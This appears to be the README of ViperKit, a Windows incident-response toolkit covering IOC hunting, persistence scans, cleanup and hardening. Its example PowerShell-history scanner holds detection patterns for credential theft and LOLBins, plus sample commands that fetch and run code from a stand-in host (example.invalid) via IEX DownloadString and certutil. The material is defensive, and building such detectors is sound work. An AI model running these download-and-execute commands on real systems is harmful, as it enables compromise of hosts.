USE AT YOUR OWN RISK. ViperKit is an open-source project provided AS-IS with NO WARRANTY or guarantee of issue resolution. The author is NOT responsible for any damages, data loss, or system issues resulting from the use of this tool. Always test in a safe environment and maintain backups before performing any remediation actions.
- Overview
- Key Features
- System Requirements
- Installation
- Quick Start
- Workflow
- Features by Tab
- Screenshots
- Building from Source
- File Locations
- Contributing
- License
## Overview

ViperKit is a portable, offline-first incident response toolkit for Windows, designed for MSPs and IT teams without dedicated security staff.

It is built for:

- Tier 1/2 Help Desk Technicians
- MSP Engineers
- IT Staff with limited cybersecurity experience
- Security professionals needing portable IR tools
ViperKit provides a guided incident workflow that walks you from initial detection to complete remediation:

```text
"I think this box is compromised"
  ↓ HUNT     → Find the suspicious tool/file
  ↓ PERSIST  → Discover persistence + analyze PowerShell history
  ↓ SWEEP    → Find related artifacts (time clustering)
  ↓ CLEANUP  → Safely remove threats (with undo)
  ↓ HARDEN   → Apply security controls
  ↓ BASELINE → Capture clean state
  ↓ CASE     → Export complete documentation
```
What ViperKit is not:

- ❌ Not an antivirus or EDR replacement
- ❌ Not automated malware removal
- ❌ Not cloud-dependent (works fully offline)
- ❌ Not a magic "fix everything" button
## Key Features

### Dashboard

- Case management (start new / load existing)
- System snapshot (hostname, user, OS version)
- Baseline capture and comparison for monitoring
- Demo Mode - Guided walkthrough for training
- Admin privilege detection with warning banner
- Scrollable interface for multiple cases
### Hunt

- 6 IOC types (File/Path, Hash, Domain/URL, IP, Registry, Name/Keyword) plus Auto-detect
- File metadata extraction and multi-hash calculation (MD5/SHA1/SHA256)
- DNS lookups, HTTP probes, reverse DNS, ping tests
- Process enumeration and scoped file searches
- Set case focus to track targets across all tabs
- Hunt history dropdown remembers last 10 searches
### Persist

- Comprehensive coverage: Registry Run keys, Services, Scheduled Tasks, Startup folders
- High-signal detection: IFEO debuggers, Winlogon hijacks, AppInit_DLLs
- Risk assessment with color-coded badges (CHECK/NOTE/OK)
- MITRE ATT&CK technique mapping
- Publisher extraction from executables
- Focus highlighting with colored borders
- PowerShell History Analysis:
  - Scans PS 5.1 and PS 7 history from all users
  - Risk scoring (HIGH/MEDIUM/LOW) with pattern matching
  - Base64 decoding for encoded commands
  - Detects downloads, execution bypasses, LOLBins, credential access
  - Filtering by severity, user, version, recency
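As an added illustration of the history analysis described above (example code written for this README, not ViperKit's own scanner), the block below reads PSReadLine history lines, decodes `-EncodedCommand` payloads (base64 of UTF-16LE text) and scores each command with a small constructed rule set; the rule set, severities and sample history are this example's own assumptions.

```python
import base64
import re

# Rule set for this example (constructed here, not ViperKit's own signatures); each
# rule maps a behaviour the README lists to a regex and a severity.
RULES = [
    ("download", r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b", "HIGH"),
    ("encoded-command", r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", "HIGH"),
    ("credential-access", r"sekurlsa|lsass|Get-Credential|vaultcmd", "HIGH"),
    ("exec-bypass", r"-ExecutionPolicy\s+Bypass|-ep\s+bypass|\bIEX\b|Invoke-Expression", "MEDIUM"),
    ("lolbin", r"\b(?:certutil|mshta|rundll32|regsvr32|bitsadmin)(?:\.exe)?\b", "MEDIUM"),
]
COMPILED = [(name, re.compile(rx, re.I), sev) for name, rx, sev in RULES]
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
RANK = {"LOW": 0, "MEDIUM": 1, "HIGH": 2}

def decode_encoded_command(line):
    """Decode a -EncodedCommand argument (base64 of UTF-16LE text); '' if absent/invalid."""
    m = ENC_RE.search(line)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""

def score_command(line):
    """Run every rule over the raw line plus its decoded payload; keep the worst severity."""
    decoded = decode_encoded_command(line)
    text = line + "\n" + decoded
    hits = [(name, sev) for name, rx, sev in COMPILED if rx.search(text)]
    severity = max((sev for _, sev in hits), key=RANK.get, default="LOW")
    return {"command": line, "decoded": decoded, "hits": [n for n, _ in hits], "severity": severity}

def analyze_history(text, min_severity="LOW"):
    """Score each line of ConsoleHost_history.txt (written by PS 5.1 and PS 7 under each
    user's %APPDATA%\\Microsoft\\Windows\\PowerShell\\PSReadLine\\) and filter by severity."""
    results = [score_command(l.strip()) for l in text.splitlines() if l.strip()]
    return [r for r in results if RANK[r["severity"]] >= RANK[min_severity]]

# Constructed sample history (not captured from a real host).
_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x.ps1')".encode("utf-16-le")
).decode()
SAMPLE_HISTORY = "\n".join([
    "Get-Process | Sort-Object CPU -Descending | Select-Object -First 5",
    "powershell.exe -nop -w hidden -enc " + _ENCODED,
    "certutil -urlcache -split -f http://example.invalid/a.txt a.txt",
    "Set-ExecutionPolicy Bypass -Scope Process",
])
```

Calling `analyze_history(SAMPLE_HISTORY, "MEDIUM")` returns the three suspicious lines with their matched rule names and, for the encoded one, the decoded download command.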
- Time clustering: Find files created ±1-8h around suspicious activity
- Folder clustering: Detect related files in same directory
- Severity-based classification (HIGH/MEDIUM/LOW)
- VirusTotal integration for hash lookups
- Focus integration with multi-color highlighting
### Cleanup

- Quarantine files with full undo capability
- Disable services and scheduled tasks (reversible)
- Registry backup before deletion
- Journal-based tracking for audit trail
- Confirmation dialogs for destructive actions
- Preview before execute workflow
- Execute all / execute selected
- Stats display (total, pending, completed, failed)
### Harden

- Security Profiles:
  - Standard - Balanced security for most environments
  - Strict - Maximum security (may impact compatibility)
  - Custom - Manually select individual actions
- 15 Hardening Actions across 5 categories:
  - Script Execution (disable WSH, PS v2, enable logging)
  - Firewall (enable all profiles, block RMM ports)
  - Defender (realtime, cloud, PUA, controlled folders)
  - AutoRun/AutoPlay disable
  - Remote Access (RDP NLA, disable RDP)
- Apply and rollback capability
- Journal tracking for all changes
- Current state detection before applying
### Case

- Chronological event timeline from all activities
- Focus targets tracking
- Professional PDF reports powered by QuestPDF:
  - Executive summary with risk breakdown
  - Critical next steps (password resets, monitoring, patching, etc.)
  - Scans performed with totals
  - Top high-risk findings
  - Remediation actions taken
  - Hardening applied
  - Baseline information
  - Timeline of key events
- Export to: PDF, Text, JSON logs
- Auto-save case data
### Help

- Searchable help content with real-time filtering
- Safety rules (prominently displayed)
- Quick start guide
- Tab-by-tab usage instructions
- Tips & best practices
- FAQ section
- File locations reference
- Keyboard shortcuts
## System Requirements

Minimum:

- OS: Windows 10 (1809+) or Windows 11 / Windows Server 2019+
- Runtime: .NET 9.0 Runtime (or use self-contained exe)
- Privileges: Administrator rights required
- RAM: 512 MB minimum, 1 GB recommended
- Disk: 100 MB for application + space for quarantine

Recommended:

- OS: Windows 11 or Windows Server 2022
- RAM: 2 GB+
- Disk: 1 GB+ for quarantine and logs

Administrator rights are required to read:

- Registry keys (HKLM, IFEO, Winlogon)
- Services and drivers
- All user profiles (including PowerShell history)
- Scheduled tasks
- System directories

To run as admin: Right-click `ViperKit.exe` → Run as Administrator
## Installation

- Download the latest release from Releases
- Extract to a folder (e.g., `C:\Tools\ViperKit`)
- Right-click `ViperKit.exe` → Run as Administrator

Or build and run from source:

```bash
# Clone the repository
git clone https://github.com/jtarkington77/ViperKit.git
cd ViperKit/ViperKit.UI

# Build
dotnet build

# Run
dotnet run

# Or publish a self-contained exe
dotnet publish -c Release -r win-x64 --self-contained true -p:PublishSingleFile=true
```

## Quick Start

- Launch ViperKit as Administrator
- Dashboard → Start New Case (or load existing)
- Enter optional case name (e.g., "Ticket-12345")
- Go to Hunt tab
- Enter IOC: file path, domain, hash, etc.
- Click Run Hunt
- If found, click Set as Case Focus
- Go to Persist tab
- Click Run Persistence Scan
- Scroll down to PowerShell History section
- Click Scan PowerShell History
- Review highlighted items matching your focus
- Add suspicious entries to cleanup queue
- Go to Sweep tab
- Select lookback window (e.g., 7 days)
- Click Run Sweep
- Review time-clustered files (orange borders)
- Add related items to focus and cleanup
- Go to Cleanup tab
- Review queued items
- Click Execute All (confirmation dialog appears)
- Items are quarantined with full undo capability
- Go to Harden tab
- Click Scan Current State
- Select Standard or Strict profile
- Review selected actions
- Click Apply Selected
- Go to Dashboard
- Click Capture Baseline
- Return weekly to Compare to Baseline
- Go to Case tab
- Click Export Report
- PDF saved to `Documents\ViperKit\Reports\`
## Workflow

Case Focus is a global list of suspicious targets that follows you across all tabs. When you find something suspicious, add it to focus and it highlights everywhere.
Examples:
- ConnectWiseControl.Client.exe
- malware.exe
- powershell.exe
- suspicious-script.ps1
Scenario: Attacker installed ScreenConnect that keeps reappearing after uninstall.

```text
1. HUNT → Search "ScreenConnect"
   → Find: ScreenConnect.ClientService.exe
   → Set as case focus
2. PERSIST → Run persistence scan
   → See: ScreenConnect service (highlighted)
   → See: Scheduled task for ScreenConnect
   → Run PowerShell history scan
   → See: Encoded download command (HIGH risk)
   → Add to cleanup queue
3. SWEEP → Run 7-day scan with ±2h cluster window
   → See: ScreenConnect.Setup.msi (TIME CLUSTER)
   → See: helper.ps1 in AppData (TIME CLUSTER)
   → Add to focus
4. PERSIST → Re-run scan with expanded focus
   → See: Additional persistence for new items
5. CLEANUP → Review queue (service + task + files)
   → Execute cleanup
   → All items quarantined/disabled
6. HARDEN → Apply Standard profile
   → Enable script block logging
   → Enable Defender PUA protection
   → Disable AutoRun
7. BASELINE → Capture clean baseline
8. CASE → Export PDF report
   → Complete documentation for ticket
```
## Features by Tab

### Dashboard

- System snapshot (hostname, user, OS version)
- Case management (start new / load existing)
- Admin privilege detection with warning banner
- Baseline capture and comparison
- Demo Mode with guided walkthrough
- Case summary with event counts
- Scrollable content for multiple cases
### Hunt

- IOC Types: Auto-detect, File/Path, Hash, Domain/URL, IP, Registry, Name/Keyword
- Structured results with severity levels
- Hash calculation (MD5, SHA1, SHA256)
- Network probes (DNS, HTTP, ping)
- Process and file system searches
- Hunt history dropdown (last 10 searches)
- Add to case focus
### Persist

- Registry: Run/RunOnce (HKCU/HKLM + Wow6432Node)
- Winlogon: Shell/Userinit hijacks
- IFEO: Debugger hijacks
- AppInit_DLLs: DLL injection points
- Services & Drivers: Auto-start only
- Scheduled Tasks: All enabled tasks
- Startup Folders: All users + current user
- PowerShell History Analysis:
  - Scans Windows PowerShell 5.1 and PowerShell 7
  - High/Medium/Low risk scoring
  - Pattern matching for attacks (downloads, encoded commands, LOLBins)
  - Base64 decoding
  - Filtering by severity, user, version, recency
  - Export suspicious commands
- Risk assessment with color badges
- MITRE ATT&CK mapping
- Publisher extraction
- Focus highlighting
### Sweep

- Lookback windows: 24h, 3d, 7d, 30d
- Scan locations: User profiles, ProgramData, Startup, Services
- File types: Executables, DLLs, scripts, installers, archives
- Severity levels: HIGH / MEDIUM / LOW
- Time clustering: ±1h, ±2h, ±4h, ±8h configurable
- Focus highlighting:
  - Pink border: Focus term match
  - Orange border: Time cluster
  - Blue border: Folder cluster
- VirusTotal integration
- Add to cleanup queue
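An added example (not ViperKit's code) of the time- and folder-clustering logic described above, run over a constructed file listing modeled on the ScreenConnect scenario in the Workflow section: files created within ±N hours of a focus hit are tagged as a time cluster, files in a focus hit's directory as a folder cluster, and a lookback window drops older files. The severity rule and the sample paths and timestamps are this example's own assumptions.

```python
from datetime import datetime, timedelta
from pathlib import PureWindowsPath

RANK = {"LOW": 0, "MEDIUM": 1, "HIGH": 2}

def sweep(files, anchors, window_hours=2, lookback_days=7, now=None):
    """Cluster `files` around `anchors` (the case-focus hits); both are lists of
    {'path': str, 'created': datetime}. A file inside the lookback window gets
    TIME CLUSTER if created within ±window_hours of an anchor and FOLDER CLUSTER
    if it lives in an anchor's directory. The severity rule (both tags HIGH, time
    only MEDIUM, folder only LOW) is this example's own, not ViperKit's."""
    now = now or datetime.now()
    window = timedelta(hours=window_hours)
    cutoff = now - timedelta(days=lookback_days)
    anchor_paths = {PureWindowsPath(a["path"]) for a in anchors}  # case-insensitive compare
    anchor_dirs = {p.parent for p in anchor_paths}
    findings = []
    for f in files:
        path = PureWindowsPath(f["path"])
        if path in anchor_paths or f["created"] < cutoff:
            continue  # skip the focus items themselves and anything older than the lookback
        near = [a["path"] for a in anchors if abs(f["created"] - a["created"]) <= window]
        tags = (["TIME CLUSTER"] if near else []) + (["FOLDER CLUSTER"] if path.parent in anchor_dirs else [])
        if not tags:
            continue
        severity = "HIGH" if len(tags) == 2 else "MEDIUM" if near else "LOW"
        findings.append({"path": f["path"], "tags": tags, "related_to": near, "severity": severity})
    return sorted(findings, key=lambda x: -RANK[x["severity"]])  # stable: worst first

# Constructed sample listing (mirrors the Workflow scenario; not real host data).
T = datetime(2024, 5, 1, 14, 0)
NOW = datetime(2024, 5, 3, 9, 0)
ANCHORS = [{"path": r"C:\Program Files (x86)\ScreenConnect Client\ScreenConnect.ClientService.exe", "created": T}]
FILES = [
    {"path": r"C:\Program Files (x86)\ScreenConnect Client\ScreenConnect.ClientService.exe", "created": T},
    {"path": r"C:\Program Files (x86)\ScreenConnect Client\ScreenConnect.Client.dll", "created": T + timedelta(minutes=2)},
    {"path": r"C:\Users\jdoe\Downloads\ScreenConnect.Setup.msi", "created": T - timedelta(minutes=15)},
    {"path": r"C:\Users\jdoe\AppData\Roaming\helper.ps1", "created": T + timedelta(hours=2, minutes=30)},
    {"path": r"C:\Program Files (x86)\ScreenConnect Client\readme.txt", "created": datetime(2024, 4, 28, 10, 0)},
    {"path": r"C:\Users\jdoe\Documents\report.docx", "created": datetime(2024, 4, 30, 9, 0)},
    {"path": r"C:\Windows\System32\notepad.exe", "created": datetime(2023, 10, 1, 8, 0)},
]

if __name__ == "__main__":
    for hit in sweep(FILES, ANCHORS, window_hours=2, now=NOW):
        print(hit["severity"], hit["tags"], hit["path"])
```

Widening the window to ±4h pulls `helper.ps1` into the time cluster, which is the same effect as choosing a larger cluster window in the Sweep tab.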
### Cleanup

- Queue items from Persist and Sweep
- Actions:
  - Quarantine files (with undo)
  - Disable services (reversible)
  - Disable scheduled tasks (reversible)
  - Backup and delete registry keys (restorable)
- Confirmation dialogs for destructive actions
- Execute all / execute selected
- Undo last / undo selected
- Journal tracking for audit trail
- Stats display (total, pending, completed, failed)
- Open quarantine folder
### Harden

- Scan current security configuration
- 15 hardening actions across categories:
  - Script Execution: Disable WSH, disable PS v2, enable script block logging, enable module logging, set RemoteSigned policy
  - Firewall: Enable all profiles, block common RMM ports
  - Defender: Enable realtime protection, cloud protection, PUA protection, controlled folder access
  - AutoRun: Disable AutoRun, disable AutoPlay
  - Remote Access: Require NLA for RDP, disable RDP
- Security Profiles:
  - Standard - Recommended for most environments
  - Strict - Maximum security (includes all Standard + strict options)
  - Custom - Manually select individual actions
- Apply selected / select all / deselect all
- Rollback capability:
  - Rollback last action
  - Rollback all actions for this case
- Journal tracking
- Current state detection (shows what's already configured)
### Case

- Chronological event timeline
- Focus targets display
- Export formats:
  - Professional PDF report
  - Text file export
  - JSON event logs
- PDF report includes:
  - Executive summary
  - Critical next steps (password resets, monitoring, patching, documentation, network security, authentication review)
  - Scans performed with totals
  - Top high-risk findings (filtered by severity)
  - Remediation actions taken
  - Hardening applied
  - Baseline information
  - Timeline of key events
- Auto-save case data
### Help

- Searchable documentation with real-time filtering
- Safety rules (highlighted warning section)
- Quick start guide
- Tab-by-tab instructions (all 8 tabs documented)
- Tips & best practices
- FAQ section (including admin requirement)
- File locations reference
- Version info with GitHub link
## Screenshots

- Main dashboard showing case management, system snapshot, baseline capture, and Demo Mode
- IOC search with structured results, hunt history dropdown, and focus highlighting
- PowerShell history analysis with risk scoring, base64 decoding, and suspicious command detection
- Persistence mechanisms with risk assessment and focus highlighting
- Temporal clustering showing related files installed around the same time
- Remediation queue with confirmation dialogs and undo capability
- Security hardening with Standard/Strict profiles and rollback capability
- Professional PDF report with executive summary, critical next steps, and findings
## Building from Source

Prerequisites:

- .NET 9.0 SDK
- Git
- Windows 10/11 or Windows Server 2019+

```bash
# Clone repository
git clone https://github.com/jtarkington77/ViperKit.git
cd ViperKit/ViperKit.UI

# Restore dependencies
dotnet restore

# Build
dotnet build -c Release

# Run
dotnet run

# Create portable exe
dotnet publish -c Release -r win-x64 --self-contained true -p:PublishSingleFile=true -p:PublishTrimmed=false
```

Output: `ViperKit.UI\bin\Release\net9.0\win-x64\publish\ViperKit.UI.exe`
## File Locations

- Case files: `C:\ProgramData\ViperKit\Cases\{CaseId}\case.json`
- Case events: Stored in case.json
- Cleanup journal: `C:\ProgramData\ViperKit\CleanupJournals\{CaseId}_cleanup.json`
- Harden journal: `C:\ProgramData\ViperKit\HardenJournals\{CaseId}_harden.json`
- PDF reports: `C:\Users\{User}\Documents\ViperKit\Reports\`
- Text exports: `C:\ProgramData\ViperKit\Cases\{CaseId}\case_export.txt`
- Baselines: Stored in case.json within the Cases folder
- Search history: `%APPDATA%\ViperKit\hunt_history.txt`
Built with:

- .NET 9.0 - Modern .NET runtime
- Avalonia UI 11.3 - Cross-platform UI framework
- QuestPDF 2024.10.3 - Professional PDF generation
- C# - Primary language
- Windows APIs - Registry, Services, WMI, Task Scheduler
## Contributing

This is an open-source project. Contributions are welcome!
- Report bugs and feature requests on GitHub Issues
- Use at your own risk - no warranty or guarantee of issue resolution
- Follow existing code style
- Test thoroughly before submitting PRs
- Update documentation for new features
## License

Proprietary License - VENOMOUSVIPER / Jeremy Tarkington
This is an open-source project provided AS-IS for educational and professional use. See disclaimer at top.
- GitHub: ViperKit
- Issues: Report bugs and request features
- Disclaimer: Use at your own risk - no warranty or guarantee of support
Built for MSPs, IT teams, and security professionals who need portable incident response tools.
VENOMOUSVIPER - Professional cybersecurity tooling
